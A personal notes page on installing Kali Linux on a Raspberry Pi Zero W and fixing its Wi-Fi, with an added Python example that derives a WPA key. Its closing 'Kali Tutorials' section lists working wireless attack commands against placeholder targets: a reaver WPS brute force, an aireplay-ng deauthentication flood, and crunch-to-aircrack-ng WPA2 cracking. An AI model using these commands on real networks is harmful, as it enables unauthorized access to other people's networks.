Kali Linux download site for Raspberry Pi
https://www.offensive-security.com/kali-linux-arm-images/
Below are the steps I followed when the built-in Wi-Fi device (wlan0) was not recognized.
1)i installed kali on the sd card.
2)put the sd card in another pi using a usb to microsd adapter
(Insert the SD card into another, already-booted Raspbian (Pi) environment.)
3)Then mount the 2 partitions from the card under /mnt and /mnt/boot
mount /dev/sda2 /mnt/
mount /dev/sda1 /mnt/boot/
4)rpi-update the kali image
ROOT_PATH=/mnt BOOT_PATH=/mnt/boot rpi-update
5)change root to the kali image
chroot /mnt/ /bin/bash
6)update the thing
apt-get update
apt-get upgrade
7)install the wireless driver
apt-get install firmware-brcm80211
Note: in my environment this failed with a "404 Not Found" error, but wlan0 ended up working anyway.
8)copy /lib/firmware/brcm/brcmfmac43430-sdio.txt from a Raspbian image to /lib/firmware/brcm/brcmfmac43430-sdio.txt on kali
9)edit /etc/network/interfaces
auto wlan0
iface wlan0 inet dhcp
wpa-ssid "mysupercoolssidofdoom"
wpa-psk "mysupercoolpasswordofdoom"
10)exit the chroot, umount the partitions and eject the card
"That will get you kali on the pi zero w with wireless networking. But i cannot get bluetooth to work, and i soooooooo want to use my bluetooth keyboard with it. Sorry about my formatting typing this on my phone."
So says the original poster.
References
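An added example, not part of the original notes or the forum post they copy: step 9 leaves the Wi-Fi passphrase in clear text in /etc/network/interfaces. The Python below derives the 256-bit WPA PSK (PBKDF2-HMAC-SHA1, 4096 iterations, SSID as salt, the same derivation wpa_passphrase performs) and builds the stanza with the hex key instead. The function names are hypothetical, and it assumes the Debian ifupdown wpasupplicant hook, which accepts a 64-hex-digit value for wpa-psk.

```python
import hashlib
import os


def derive_psk(ssid: str, passphrase: str) -> str:
    """Return the 64-hex-digit WPA/WPA2 PSK for this SSID and passphrase."""
    ssid_b = ssid.encode("utf-8")
    pass_b = passphrase.encode("ascii")  # non-ASCII raises a ValueError subclass
    if not 1 <= len(ssid_b) <= 32:
        raise ValueError("SSID must be 1..32 bytes")
    if not 8 <= len(pass_b) <= 63:
        raise ValueError("passphrase must be 8..63 characters")
    if any(c < 32 or c > 126 for c in pass_b):
        raise ValueError("passphrase must be printable ASCII")
    # The SSID is the salt, so the key is only valid for this network name.
    return hashlib.pbkdf2_hmac("sha1", pass_b, ssid_b, 4096, 32).hex()


def interfaces_stanza(ssid: str, passphrase: str, iface: str = "wlan0") -> str:
    """Build the step-9 stanza with the derived key in place of the passphrase."""
    psk = derive_psk(ssid, passphrase)
    # Assumption: the ifupdown hook takes an unquoted SSID and a raw hex PSK.
    return (f"auto {iface}\n"
            f"iface {iface} inet dhcp\n"
            f"    wpa-ssid {ssid}\n"
            f"    wpa-psk {psk}\n")


def write_private(path: str, text: str) -> None:
    """Write text to path (caller's choice) readable by its owner only."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(text)
    os.chmod(path, 0o600)  # also tightens a file that already existed


if __name__ == "__main__":
    # Constructed sample values taken from the placeholders in step 9.
    print(interfaces_stanza("mysupercoolssidofdoom", "mysupercoolpasswordofdoom"))
```

The hex key is bound to the SSID and still lets its holder join the network, so keep the file root-only. What it avoids is leaving the human-chosen passphrase readable on the SD card.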
・Re: Kali Linux Raspberry Pi Zero W - bluetooth (03/18)
https://www.raspberrypi.org/forums/viewtopic.php?t=177530#p1133241
The steps above are almost a straight copy of this post.
・How To Set Up Kali Linux on the New $10 Raspberry Pi Zero W (07/22)
https://null-byte.wonderhowto.com/how-to/set-up-kali-linux-new-10-raspberry-pi-zero-w-0176819/
This looks interesting, so I would like to read it later.
・Re4son-Kernel for Raspberry Pi 1/2/3/Zero/Zero W (09/01)
https://whitedome.com.au/re4son/re4son-kernel/
Distribution site for precompiled kernels.
-- Added 2018.05.01 -->
・Kali Tutorials
---
5 Steps Wi-Fi
1.airmon-ng
2.airmon-ng stop wlan0
3.airodump-ng wlan0
|Information:
|
| BSSID (Basic Service Set Identification): the MAC address of access point
| Beacons: Number of announcements packets sent by the AP
| #Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
| #/s: Number of data packets per second, measured over the last 10 seconds.
| MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
| CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
| ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.
4.wash -i wlan0 -c "target channel" -C -s
if the WPS Locked status is No, then we are ready to move to step 5.
5.reaver -i wlan0 -b "target mac" --fail-wait=360
---
breaking wpa2-psk (2016/02/21)
airodump-ng wlan0 --bssid "target mac" --channel "target channel" -w "target ap"
aireplay-ng --deauth 20 -a "target mac" wlan0
crunch 20 20 0123456789abcdefghijklmnopqrstuvwxyz | aircrack-ng -b "target mac" -x1 -y -w - "target ap".cap
WPA2 Brute Force
> ./crunch 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t passw@@@| aircrack-ng -b And Target BSSID
Aircrack can't take dictionary from stdin?
> echo mywpapassword | aircrack-ng -w - -e devnetwork /tmp/captures.cap
---
HowTo : Pause/Resume Aircrack-ng
where files are saved in the session? #234 (2015/03/29)
> /usr/local/etc/reaver/ or /etc/reaver/
reaver resume from certain pin nr. #233 (2015/03/29)